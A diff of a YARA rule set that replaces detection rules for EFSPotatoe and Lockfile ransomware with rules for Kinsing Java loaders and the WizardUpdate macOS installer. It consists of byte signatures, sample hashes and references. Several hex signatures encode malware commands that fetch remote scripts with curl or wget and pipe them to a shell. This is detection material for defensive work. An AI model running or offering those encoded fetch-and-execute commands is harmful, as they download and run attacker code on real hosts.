-		$s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 }
-		$s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 }
+		$seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
+		$seq4 = { c7 45 a8 01 00 00 00 c7 45 ac 01 00 00 00 c7 05 [2] 20 00 00 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba ?? 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 48 89 c2 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff 48 89 ce 89 c7 e8 [2] ff ff 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff 8b 85 ?? ce fd ff 48 8d 8d [2] fd ff ba ff 0f 00 00 48 89 ce 89 c7 e8 [2] ff ff 89 85 40 ff ff ff 83 bd 40 ff ff ff ff 75 0a c7 85 40 ff ff ff 00 00 00 00 48 8d 85 [2] fd ff be [2] 40 00 48 89 c7 e8 [2] ff ff 48 85 c0 0f 84 d0 00 00 00 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8d 85 [2] fd ff ba 02 00 00 00 48 89 ce 48 89 c7 e8 [2] ff ff e8 [2] ff ff 89 c7 e8 [2] ff ff 48 89 45 e8 be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff 48 8b 45 e8 48 8b 00 48 89 c6 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff be 00 02 00 00 bf [2] 60 00 e8 [2] ff ff bb [2] 40 00 48 8d 95 [2] fd ff 48 8d 85 [2] fd ff 41 b8 [2] 60 00 48 89 d1 ba [2] 60 00 48 89 de 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff c7 45 ac 00 00 00 }
+		$seq5 = { 55 48 89 e5 53 89 fb 89 f0 48 89 55 d8 89 4d d4 88 5d e4 88 45 e0 0f b6 45 e4 88 45 f2 0f b6 45 e0 88 45 f3 c7 45 f4 00 00 00 00 c7 45 f4 00 00 00 00 eb 29 8b 45 f4 48 98 48 03 45 d8 8b 55 f4 48 63 d2 48 03 55 d8 0f b6 0a 0f b6 55 f2 31 ca 88 10 0f b6 45 f3 00 45 f2 83 45 f4 01 8b 45 f4 3b 45 d4 7c cf b8 00 00 00 00 5b }
+		$seq6 = { 55 48 89 e5 53 48 81 ec 68 0d 00 00 48 89 bd d8 f2 ff ff c7 45 90 31 32 37 2e c7 45 94 30 2e 30 2e 48 c7 45 98 31 00 00 00 c7 45 a0 00 00 00 00 c7 85 70 ff ff ff 30 30 2d 30 c7 85 74 ff ff ff 30 2d 30 30 c7 85 78 ff ff ff 2d 30 30 2d c7 85 7c ff ff ff 30 30 2d 30 c7 45 80 30 00 00 00 48 c7 45 a8 [2] 40 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 25KB and all of ( $seq* )
 }
-rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE
 {
 	meta:
-		description = "Detect custom .NET variant EFSPotatoe tool"
+		description = "Detect Kinsing Variant A"
 		author = "Arkbird_SOLG"
-		id = "614a6543-89ce-5f75-9933-766fd1e5458b"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19"
+		id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0"
+		date = "2020-08-28"
+		modified = "2020-08-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30"
 		license_url = "N/A"
-		logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f"
+		logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
-		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
-		adversary = "Lockfile"
+		hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488"
+		hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318"
+		hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16"
+		hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c"
 
 	strings:
-		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
-		$s2 = "ncacn_np" fullword wide
-		$s3 = "WinSta0\\Default" fullword wide
-		$s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 }
-		$s5 = "EfsPotato <cmd>" wide
-		$s6 = "\\\\.\\pipe\\" wide
+		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
+		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
+		$ClassCode3 = "java/net/URL" fullword ascii
+		$ClassCode4 = "java/net/URLConnection" fullword ascii
+		$ClassCode5 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
+		$Com1 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 63 75 72 6C 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
+		$Com2 = { 52 75 6E 74 69 6D 65 2E 67 65 74 52 75 6E 74 69 6D 65 28 29 2E 65 78 65 63 28 6E 65 77 20 53 74 72 69 6E 67 5B 5D 20 7B 20 22 2F 62 69 6E 2F 62 61 73 68 22 2C 20 22 2D 63 22 2C 20 22 77 67 65 74 20 2D 71 20 2D 4F 20 2D 20 22 20 2B 20 73 20 2B 20 22 7C 73 68 22 20 7D }
+		$Com3 = "chmod +x " fullword ascii
+		$Com4 = { 53 4b 4c 01 00 02 6c 66 }
+		$s1 = "User-Agent" fullword ascii
+		$s2 = "kinsing" fullword ascii
+		$s3 = { 6f 73 2e 6e 61 6d 65 }
+		$s4 = "getAbsolutePath" fullword ascii
+		$s5 = { 6f 70 65 6e 43 6f 6e 6e 65 63 74 69 6f 6e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
+		filesize < 1KB and 4 of ( $ClassCode* ) and 3 of ( $Com* ) and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE
 {
 	meta:
-		description = "Detect loader used by lockerfile group"
+		description = "Detect Kinsing Variant B"
 		author = "Arkbird_SOLG"
-		id = "031335f3-e6c7-5e94-af23-c7fb254203b7"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16"
+		id = "7e0f9826-806c-5801-aab5-d2a8dba4e206"
+		date = "2020-08-28"
+		modified = "2020-08-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52"
 		license_url = "N/A"
-		logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b"
+		logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291"
-		adversary = "Lockfile"
+		hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960"
+		hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\calc.exe" fullword ascii
-		$s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc }
-		$s3 = "/proc/123/stat" fullword ascii
-		$s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 }
+		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
+		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
+		$ClassCode3 = "java/net/URL" fullword ascii
+		$ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
+		$Com1 = "chmod +x " fullword ascii
+		$Com2 = { 53 4b 4c 01 00 02 6c 66 }
+		$s1 = "kinsing" fullword ascii
+		$s2 = "getAbsolutePath" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 3 of ( $s* )
+		filesize < 1KB and 3 of ( $ClassCode* ) and 1 of ( $Com* ) and 2 of ( $s* )
 }
-rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE
+rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect EFSPotatoe tool (Generic rule)"
+		description = "Detect WizardUpdate installer on OSX system"
 		author = "Arkbird_SOLG"
-		id = "f40673da-7b16-5657-ba9a-f3f13034ad12"
-		date = "2021-08-27"
-		modified = "2021-08-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20"
+		id = "50974725-6b45-5f2f-aa76-ae73dc752873"
+		date = "2021-10-22"
+		modified = "2021-10-23"
+		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3"
+		logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
-		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
-		hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583"
-		hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd"
+		hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3"
+		hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b"
+		hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4"
+		tlp = "White"
 		adversary = "-"
 
 	strings:
-		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
-		$s2 = "ncacn_np" fullword wide
-		$s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 }
-		$s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 }
-		$s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 4 of ( $s* )
-}
-rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE
-{
-	meta:
-		description = "Detect Lockfile ransomware (unpacked version)"
-		author = "Arkbird_SOLG"
-		id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63"
-		score = 50
-		quality = 75
-		tags = "FILE"
-		hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c"
-		level = "experimental"
-		adversary = "Lockfile"
-
-	strings:
-		$s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff }
-		$s2 = "winsta0\\default" fullword ascii
-		$s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 }
-		$s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 }
-		$s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 }
-		$s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
-}
-rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE
-{
-	meta:
-		description = "Detect lockfile ransomware (Packed version)"
-		author = "Arkbird_SOLG"
-		id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18"
-		license_url = "N/A"
-		logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9"
-		score = 50
-		quality = 75
-		tags = "FILE"
-		hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a"
-		hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce"
-		level = "Experimental"
-		adversary = "Lockfile"
-
-	strings:
-		$s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 }
-		$s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 }
-		$s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 }
-		$s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 }
+		$s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 }
+		$s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff }
+		$s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101"
+		$s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
+		uint32( 0 ) == 0xFEEDFACF and filesize > 50KB and ( ( $s1 and $s3 ) or ( $s2 and $s4 ) )
 }
-rule ARKBIRD_SOLG_APT_MAL_NK_Rivts_Feb_2009_1 : FILE
+rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE
 {
 	meta:
-		description = "Detect Rivts malware used by NK APT"
+		description = "Detect a structure like the bash of WizardUpdate installer on OSX system"
 		author = "Arkbird_SOLG"
-		id = "71dacbd4-36bb-5a45-a288-31bfaef784dc"
-		date = "2020-06-17"
-		modified = "2020-06-18"
